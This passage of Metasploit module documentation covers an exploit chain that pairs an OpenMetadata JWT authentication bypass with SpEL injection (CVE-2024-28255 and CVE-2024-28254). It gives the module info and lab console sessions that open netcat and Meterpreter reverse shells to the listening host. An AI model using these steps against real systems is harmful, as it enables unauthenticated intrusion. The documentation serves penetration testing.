msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > unset rhosts
Unsetting rhosts...
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info

       Name: OpenMetadata authentication bypass and SpEL injection exploit chain
     Module: exploit/linux/http/openmetadata_auth_bypass_rce
   Platform: Unix, Linux
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-03-15

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Alvaro Muñoz alias pwntester (https://github.com/pwntester)

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                        html
  RPORT      8585             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path of the OpenMetadata web application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  OpenMetadata is a unified platform for discovery, observability, and governance powered
  by a central metadata repository, in-depth lineage, and seamless team collaboration.
  This module chains two vulnerabilities that exist in the OpenMetadata aplication.
  The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
  It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded
  endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
  to make any path contain any arbitrary strings that will match the excluded endpoint condition
  and therefore will be processed with no JWT validation allowing an attacker to bypass the
  authentication mechanism and reach any arbitrary endpoint.
  By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
  at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
  are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
  authentication.
  OpenMetadata versions `1.2.3` and below are vulnerable.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-28255
  https://nvd.nist.gov/vuln/detail/CVE-2024-28254
  https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/
  https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255
  https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/

View the full module info with the info -d command.
```
## Scenarios
### OpenMetadata 1.2.3 Automatic - cmd/unix/reverse_netcat_gaping
```msf
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set rhosts 192.168.201.42
rhosts => 192.168.201.42
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
[+] The target is vulnerable. Version 1.2.3
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Command shell session 17 opened (192.168.201.8:4444 -> 192.168.201.42:55160) at 2024-07-29 15:27:38 +0000

id
uid=1000(openmetadata) gid=1000(openmetadata) groups=1000(openmetadata)
pwd
/opt/openmetadata
uname -a
Linux 1e3c578a0acc 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 Linux
```
### OpenMetadata 1.2.3 Automatic - cmd/linux/http/x64/meterpreter/reverse_tcp
```msf
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
[+] The target is vulnerable. Version 1.2.3
[*] Executing Automatic for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 192.168.201.42
[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:50599) at 2024-07-31 14:31:37 +0000

meterpreter > getuid
Server username: openmetadata
meterpreter > sysinfo
Computer     : 172.16.240.4
OS           :  (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/opt/openmetadata
meterpreter >
```
## Limitations
No limitations.